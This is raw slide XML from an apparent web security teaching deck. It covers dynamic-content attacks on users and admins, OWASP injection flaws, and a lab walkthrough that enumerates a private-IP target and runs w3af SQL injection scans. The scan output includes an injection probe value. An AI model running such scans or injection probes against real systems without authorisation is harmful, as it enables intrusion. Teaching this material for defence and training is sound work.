        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="Shape 304"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3822300" y="2986550"/>
            <a:ext cx="1376460" cy="1646892"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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Internet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442450" y="4633450"/>
            <a:ext cx="4608900" cy="19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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic content is everywhere today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Feeds pulled from other websites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embedded remote resources (youtube, jpgs, pngs, etc...)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advertisements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sometimes with javascript!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viral videos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sign in with twitter, facebook, gmail, etc...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/>
              <a:t>and more!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4363070" y="1597762"/>
            <a:ext cx="47196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chemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Users are often attacked by malicious content that executes code on their machine.  Usually client-side scripting is exploited, such as: javascript, actionscript, vbscript, html5....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Shape 11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Enumeration Report</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1168" name="Shape 116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 back, and type "</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>"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We'll get LOTS of results but the breakdown is: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800"/>
              <a:t>Target is running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng"/>
              <a:t>Apache/2.2.16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> on Debian (So its hosting a website)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800"/>
              <a:t>the target is running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng"/>
              <a:t>PHP/5.3.3-7+squeeze13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>,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800"/>
              <a:t>has active filtering on URLs,  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800"/>
              <a:t>the site has the following directories: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br>
              <a:rPr lang="en" sz="1800"/>
            </a:br>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1169" name="Shape 1169"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="405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{927AFFBE-70E4-4FC7-8A94-46933CCBDF17}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457200" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="48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/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="48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/admin/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="48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/admin/index.php</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="48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/all/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="48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/cat/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="48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/classes/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="48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/css/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57200" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="48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/footer/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="48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/header/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="48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/icons/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="48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/images/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="48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/index/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="48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/show/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Shape 11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OK Vulnerability Analysis time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175" name="Shape 1175"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1417638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enter the target ip in a web browser (I'm using firefox + burpsuite, as always) and visit those URLs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76" name="Shape 1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682" y="2495087"/>
            <a:ext cx="7622342" cy="4282238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Shape 1177"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867900" y="3983525"/>
            <a:ext cx="2785200" cy="9903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We've used BurpSuite before, so that wont be covered this time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Shape 118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Vuln scanning with w3af</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1183" name="Shape 118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w3af/plugins&gt;&gt;&gt; audit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(Gives us a list of audit tools)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we'll use:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>w3af/plugins&gt;&gt;&gt;audit blindSqli sqli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but we need to change the target b4 we begin, to give it some of the URLs we discovered.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Shape 118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w3af setup again</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1189" name="Shape 118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 back twice and goto target and give it a few URLs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w3af/config:target&gt;&gt;&gt;set target 192.168.43.130,http://192.168.43.130/,http://192.168.43.130/cat.php?id=1,http://192.168.43.130/admin/login.php,http://192.168.43.130/all.php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u="sng"/>
              <a:t>so, the cat.php, admin/login.php, and all.php pages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Shape 119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Interesting Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1195" name="Shape 119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Found 6 URLs and 6 different points of injection.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The list of fuzzable requests is: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- http://192.168.43.130 | Method: GET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- http://192.168.43.130/ | Method: GET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- </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400" u="sng"/>
              <a:t>http://192.168.43.130/admin/index.php | Method: POST | Parameters: (user="", password="")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- http://192.168.43.130/admin/login.php | Method: GET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- http://192.168.43.130/all.php | Method: GET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- http://192.168.43.130/cat.php | Method: GET | Parameters: (id="1")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b="1" lang="en" sz="1400" u="sng"/>
              <a:t>Blind SQL injection was found at: "http://192.168.43.130/cat.php", using HTTP method GET. The injectable parameter is: "id". This vulnerability was found in the requests with ids 250 to 251.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A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "MySQL server version for the right syntax to use". The error was found on response with id 261.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A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "You have an error in your SQL syntax;". The error was found on response with id 261.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SQL injection in a MySQL database was found at: "http://192.168.43.130/cat.php", using HTTP method GET. The sent data was:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400" u="sng"/>
              <a:t> "id=d%27z%220"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>. This vulnerability was found in the request with id 261.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Scan finished in 7 seconds.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20075"/>
            <a:ext cx="2679700" cy="17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Attacking the Users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Shape 313"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924507" y="3756338"/>
            <a:ext cx="1175400" cy="11433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314" name="Shape 314"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="4811469" y="3988142"/>
            <a:ext cx="1701900" cy="7284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FIREWALL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Shape 315"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610621" y="4968357"/>
            <a:ext cx="1191000" cy="92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Authentication</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Shape 316"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7916630" y="4968357"/>
            <a:ext cx="1191000" cy="92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Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Shape 317"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7836664" y="2787097"/>
            <a:ext cx="1263300" cy="92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Web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="Shape 318"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125575" y="3434605"/>
            <a:ext cx="1343250" cy="999432"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator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 Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="319" name="Shape 319"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="318" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2458075" y="3244621"/>
            <a:ext cx="3667500" cy="6897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0" name="Shape 320"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2199961" y="3539498"/>
            <a:ext cx="3957600" cy="5667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1" name="Shape 321"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="318" idx="3"/>
            <a:endCxn id="313" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7468825" y="3934321"/>
            <a:ext cx="455700" cy="39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322" name="Shape 322"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="317" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7412764" y="3250747"/>
            <a:ext cx="423900" cy="39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323" name="Shape 323"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7324863" y="4433998"/>
            <a:ext cx="663600" cy="55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324" name="Shape 324"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="318" idx="2"/>
            <a:endCxn id="315" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6797200" y="4434037"/>
            <a:ext cx="408900" cy="53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325" name="Shape 325"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7021870" y="2671820"/>
            <a:ext cx="622800" cy="61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AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Shape 326"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172864" y="2671820"/>
            <a:ext cx="744300" cy="6183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FLASH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/ FLEX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Shape 327"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5665543" y="5097051"/>
            <a:ext cx="887700" cy="6183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APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Shape 328"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5847436" y="5763990"/>
            <a:ext cx="887700" cy="6183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Silverlight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Shape 329"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6817528" y="5824621"/>
            <a:ext cx="887700" cy="61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AND MORE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491625" y="1578075"/>
            <a:ext cx="3859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Specifics on other common dynamic content attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331" name="Shape 331"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="2192950" y="3064800"/>
            <a:ext cx="1701900" cy="7284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FIREWALL   +  NAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="Shape 332"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3822300" y="2986550"/>
            <a:ext cx="1376460" cy="1646892"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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Internet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>
            <a:off x="688150" y="4240125"/>
            <a:ext cx="135300" cy="41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34" name="Shape 334"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405575" y="4633442"/>
            <a:ext cx="2114100" cy="1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 Browsers, browser plugins, and media viewer plugins are all subject to exploitable vulnerabilities (buffer overflows, integer overflows, etc...)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="335" name="Shape 335"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="327" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="4572043" y="5406201"/>
            <a:ext cx="1093500" cy="38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lgDash"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="336" name="Shape 336"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="328" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4596436" y="5997540"/>
            <a:ext cx="1251000" cy="7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lgDash"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="Shape 337"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4522850" y="2249125"/>
            <a:ext cx="1929575" cy="3404425"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="136177" w="77183">
                <a:moveTo>
                  <a:pt x="0" y="136177"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22614" y="12782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56043" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77183" y="16223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lgDash"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Shape 338"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3062750" y="5070975"/>
            <a:ext cx="1732800" cy="14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chemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious content can be uploaded onto sites by hackers to attack these browser vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="339" name="Shape 3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1444" y="1201181"/>
            <a:ext cx="3385112" cy="2253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Shape 3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20075"/>
            <a:ext cx="2679700" cy="17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Shape 3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Attacking the Admins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Shape 346"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924507" y="3756338"/>
            <a:ext cx="1175400" cy="11433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347" name="Shape 347"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="4811469" y="3988142"/>
            <a:ext cx="1701900" cy="7284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FIREWALL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="Shape 348"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610621" y="4968357"/>
            <a:ext cx="1191000" cy="92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Authentication</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="Shape 349"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7916630" y="4968357"/>
            <a:ext cx="1191000" cy="92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Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="Shape 350"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7836664" y="2787097"/>
            <a:ext cx="1263300" cy="92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Web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="Shape 351"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125575" y="3434605"/>
            <a:ext cx="1343250" cy="999432"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator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 Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="352" name="Shape 352"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="351" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2458075" y="3244621"/>
            <a:ext cx="3667500" cy="6897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2199961" y="3539498"/>
            <a:ext cx="3957600" cy="5667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4" name="Shape 354"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="351" idx="3"/>
            <a:endCxn id="346" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7468825" y="3934321"/>
            <a:ext cx="455700" cy="39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355" name="Shape 355"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="350" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7412764" y="3250747"/>
            <a:ext cx="423900" cy="39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356" name="Shape 356"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7324863" y="4433998"/>
            <a:ext cx="663600" cy="55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357" name="Shape 357"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="351" idx="2"/>
            <a:endCxn id="348" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6797200" y="4434037"/>
            <a:ext cx="408900" cy="53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358" name="Shape 358"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7021870" y="2671820"/>
            <a:ext cx="622800" cy="61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AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Shape 359"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172864" y="2671820"/>
            <a:ext cx="744300" cy="61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FLASH</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>/ FLEX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360" name="Shape 360"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5665543" y="5097051"/>
            <a:ext cx="887700" cy="61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APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="Shape 361"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5847436" y="5763990"/>
            <a:ext cx="887700" cy="61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Silverlight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="Shape 362"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6817528" y="5824621"/>
            <a:ext cx="887700" cy="61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AND MORE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491625" y="1578075"/>
            <a:ext cx="3859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Admins are users too!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364" name="Shape 364"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="2192950" y="3064800"/>
            <a:ext cx="1701900" cy="7284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FIREWALL   +  NAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Shape 365"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3822300" y="2986550"/>
            <a:ext cx="1376460" cy="1646892"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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Internet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528475" y="4328650"/>
            <a:ext cx="3711600" cy="18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Attackers can target users to hopefully compromise an administrator account on the webserver. (to gain more access)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Usually these types of attacks are limited to cookie stealing / session hijacking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forum admin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CMS admin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wordpress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drupal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="367" name="Shape 367"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1462550" y="1962746"/>
            <a:ext cx="1610064" cy="1327374"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2">
            <a:avLst/>
          </a:pr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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Shape 368"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1369125" y="2925784"/>
            <a:ext cx="1610064" cy="1327374"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2">
            <a:avLst/>
          </a:pr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CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Shape 369"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329350" y="1739035"/>
            <a:ext cx="1610064" cy="1327374"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2">
            <a:avLst/>
          </a:pr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media 0days</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="370" name="Shape 370"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="144994" y="2718586"/>
            <a:ext cx="1794420" cy="1610064"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2">
            <a:avLst/>
          </a:pr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browser 0days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formal approach</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Shape 376"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4836036"/>
            <a:ext cx="7772400" cy="103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All kinds of messy flaws, means organization is needed</a:t>
            </a:r>
          </a:p>
        </p:txBody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OWASP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https://www.owasp.org/index.php/Main_Page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wiki for web security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Flaws are categorized &amp; ranked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OWASP Top 10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Tons of pages on how to defend against attacks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SQLi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LDAP injection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XSS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CSRF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388" name="Shape 3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304" y="330338"/>
            <a:ext cx="8557392" cy="4877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Formal Approach to Vulnerability Assessment (OWASP top 10)</a:t>
            </a:r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95" name="Shape 3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4809"/>
            <a:ext cx="9143999" cy="5138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4294967295"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SQLi is the #1 application security risk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="401" name="Shape 4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176257" cy="69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Injection Flaws</a:t>
            </a:r>
          </a:p>
        </p:txBody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Mixing code and data in same context as input to a web application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Hostile input parsed by interpreter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>nothing new for 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 rot="-5400000">
            <a:off x="2870089" y="3358538"/>
            <a:ext cx="2139000" cy="9153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FIREWALL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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20075"/>
            <a:ext cx="2679700" cy="17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Architecture Components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6782625" y="3067175"/>
            <a:ext cx="1477200" cy="1437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47" name="Shape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131350" y="4590425"/>
            <a:ext cx="1497000" cy="116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Authentication</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Shape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6772725" y="4590425"/>
            <a:ext cx="1497000" cy="116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Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
